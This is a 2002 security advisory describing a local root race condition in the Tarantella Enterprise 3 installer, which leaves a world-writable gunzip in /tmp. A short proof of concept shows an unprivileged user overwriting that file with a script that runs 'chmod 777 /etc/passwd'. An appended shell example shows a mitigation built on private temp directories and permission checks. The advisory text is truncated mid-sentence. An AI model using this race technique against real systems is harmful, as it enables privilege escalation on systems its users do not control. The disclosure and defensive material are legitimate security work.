From: Larry W. Cashdollar (lwcvapid.dhs.org)
Date: Sat Jan 26 2002 - 08:46:34 CST
-----BEGIN PGP SIGNED MESSAGE-----
Larry W. Cashdollar
Vulnerability report for Tarantella Enterprise 3.
1. local root compromise during installation:
The installation script provided with Tarantella handles utility
packages during installation insecurely. A root-owned binary "gunzip"
is created in /tmp with world-writable permissions, the pid is appended
to the filename.
$ ls -l /tmp/gunzip16152
-rwxrwxrwx 1 root root 51808 Jan 14 00:15 gunzip16152
gunzip is extracted:
extract gunzip > "$TMP_GUNZIP" 2>>$SHXLOGFILE
extract gunzip | uncompress > "$TMP_GUNZIP" 2>>$SHXLOGFILE
The permissions of gunzip are changed to rwx for all:
chmod 777 $TMP_GUNZIP >/dev/null 2>&1
The binary is used during installation:
extract $efilename | $TMP_GUNZIP -q > "$efilename"
There is a race condition between when gunzip is extracted and when it is
used during installation, at which time a malicious local user could inject
code to compromise the system quickly.
$ echo "#!/bin/sh" > /tmp/test.sh
$ echo "chmod 777 /etc/passwd" >> /tmp/test.sh
$ cat /tmp/test.sh > /tmp/gunzip16152
I was able to change the permissions of /etc/passwd to 777 by performing the
above as an unprivileged user.
Perhaps create a directory in /tmp or /var/tmp and use that directory as a
4. Software: Tarantella Enterprise 3
Tested on Linux Debian 2.2
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org
-----END PGP SIGNATURE-----
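The mitigation the report points toward (a private directory instead of a world-writable helper in /tmp), written out as an added example; this is not part of the original post and not Tarantella's installer code. It assumes a POSIX sh with mktemp and find. The variable name TMP_GUNZIP and the "gunzip" helper name are borrowed from the advisory; every other function and file name is invented here, and the helper contents used in testing are a constructed stand-in for the real binary.

```shell
#!/bin/sh
# Added example (not Tarantella's installer): safer handling of an extracted
# helper binary during installation. TMP_GUNZIP and the "gunzip" name come
# from the advisory; all other names are assumptions made for this example.

# Create a private work directory instead of a predictable /tmp/gunzip$$ path.
# mktemp -d creates it with mode 0700, so no other user can create, replace or
# modify files inside it. Prints the directory path.
make_private_tmpdir() {
    umask 077
    mktemp -d "${TMPDIR:-/tmp}/tarantella-install.XXXXXX"
}

# Copy the extracted helper into the private directory as an owner-only
# executable (mode 0700 rather than the 0777 the original script used).
# Refuses to reuse a path that already exists. Prints the helper path.
install_helper() {
    dir=$1
    src=$2
    TMP_GUNZIP="$dir/gunzip"
    umask 077
    [ ! -e "$TMP_GUNZIP" ] || return 1
    cat "$src" > "$TMP_GUNZIP" || return 1
    chmod 700 "$TMP_GUNZIP" || return 1
    printf '%s\n' "$TMP_GUNZIP"
}

# Pre-execution check: succeed (exit 0) only if the helper is a regular file
# and neither it nor its directory is writable by group or others.
helper_is_safe() {
    f=$1
    d=$(dirname "$f")
    [ -f "$f" ] || return 1
    [ -z "$(find "$f" -prune \( -perm -0002 -o -perm -0020 \) -print)" ] || return 1
    [ -z "$(find "$d" -prune \( -perm -0002 -o -perm -0020 \) -print)" ] || return 1
    return 0
}

# Detection: list regular files under a directory that any user can write,
# the condition the advisory found for /tmp/gunzip<pid>.
list_world_writable() {
    find "$1" -type f -perm -0002 -print
}

# Installer usage: run the helper only after the check passes, so a helper
# that was tampered with (or had its permissions loosened) is never executed.
run_helper_checked() {
    helper_is_safe "$1" || return 1
    "$1"
}
```

In an installer, the sequence is make_private_tmpdir, install_helper on the extracted file, then run_helper_checked in place of calling $TMP_GUNZIP directly; list_world_writable over /tmp or /var/tmp is the quick check an administrator can run on a finished install to confirm no 0777 helper was left behind.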